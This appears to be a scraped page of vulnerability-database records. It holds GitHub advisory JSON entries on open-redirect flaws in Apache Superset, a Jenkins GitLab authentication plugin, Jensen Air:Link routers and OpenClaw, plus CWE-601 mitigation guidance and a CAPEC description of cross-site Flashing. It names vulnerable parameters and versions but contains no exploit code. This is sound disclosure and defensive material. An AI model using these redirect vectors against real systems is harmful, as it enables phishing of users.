"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-pfwg-rxf4-97c3"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/superset"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-superset/PYSEC-2021-128.yaml"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r89b5d0dd35c1adc9624b48d6247729c73b2641b32754226661368434%40%3Cdev.superset.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r89b5d0dd35c1adc9624b48d6247729c73b2641b32754226661368434@%3Cdev.superset.apache.org%3E"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/04/27/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open Redirect in Apache Superset"
}
GHSA-PG59-2W33-8VMC
Vulnerability from github – Published: 2022-05-24 16:52 – Updated: 2023-12-20 13:32GitLab Authentication Plugin records the HTTP Referer header when the authentication process starts and redirects users to that URL when the user has finished logging in.
This implements an open redirect, allowing malicious sites to implement a phishing attack, with users expecting they have just logged in to Jenkins.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.4"
},
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:gitlab-oauth"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-10372"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-03T22:49:24Z",
"nvd_published_at": "2019-08-07T15:15:00Z",
"severity": "MODERATE"
},
"details": "GitLab Authentication Plugin records the HTTP `Referer` header when the authentication process starts and redirects users to that URL when the user has finished logging in.\n\nThis implements an open redirect, allowing malicious sites to implement a phishing attack, with users expecting they have just logged in to Jenkins.",
"id": "GHSA-pg59-2w33-8vmc",
"modified": "2023-12-20T13:32:45Z",
"published": "2022-05-24T16:52:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10372"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/gitlab-oauth-plugin/commit/10059a4d4e121e0c3b13f6e6f74843565bb0b49a"
},
{
"type": "WEB",
"url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-796"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2019/08/07/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Jenkins Gitlab Authentication Plugin Open Redirect vulnerability"
}
GHSA-PG6W-MG2W-J6WF
Vulnerability from github – Published: 2022-05-17 02:51 – Updated: 2022-05-17 02:51Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the return-url parameter to /goform/formLogout.
{
"affected": [],
"aliases": [
"CVE-2016-10316"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-04-03T05:59:00Z",
"severity": "MODERATE"
},
"details": "Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the return-url parameter to /goform/formLogout.",
"id": "GHSA-pg6w-mg2w-j6wf",
"modified": "2022-05-17T02:51:00Z",
"published": "2022-05-17T02:51:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10316"
},
{
"type": "WEB",
"url": "https://www.riskbasedsecurity.com/research/RBS-2016-004.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PG8G-F2HF-X82M
Vulnerability from github – Published: 2026-04-09 00:31 – Updated: 2026-04-10 20:24Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-qx8j-g322-qj6m. This link is maintained to preserve external references.
Original Description
OpenClaw before 2026.3.31 (patched in 2026.4.8) contains a request body replay vulnerability in fetchWithSsrFGuard that allows unsafe request bodies to be resent across cross-origin redirects. Attackers can exploit this by triggering redirects to exfiltrate sensitive request data or headers to unintended origins.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.4.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T20:24:54Z",
"nvd_published_at": "2026-04-08T22:16:24Z",
"severity": "HIGH"
},
"details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qx8j-g322-qj6m. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.31 (patched in 2026.4.8) contains a request body replay vulnerability in fetchWithSsrFGuard that allows unsafe request bodies to be resent across cross-origin redirects. Attackers can exploit this by triggering redirects to exfiltrate sensitive request data or headers to unintended origins.",
"id": "GHSA-pg8g-f2hf-x82m",
"modified": "2026-04-10T20:24:54Z",
"published": "2026-04-09T00:31:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40037"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects",
"withdrawn": "2026-04-10T20:24:54Z"
}
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- Use a list of approved URLs or domains to be used for redirection.
Mitigation
Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page.
Mitigation MIT-21.2
Strategy: Enforcement by Conversion
- When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
- For example, ID 1 could map to "/login.asp" and ID 2 could map to "http://www.example.com/". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Mitigation
Ensure that no externally-supplied requests are honored by requiring that all redirect requests include a unique nonce generated by the application [REF-483]. Be sure that the nonce is not predictable (CWE-330).
Mitigation MIT-6
Strategy: Attack Surface Reduction
- Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
- Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-178: Cross-Site Flashing
An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application.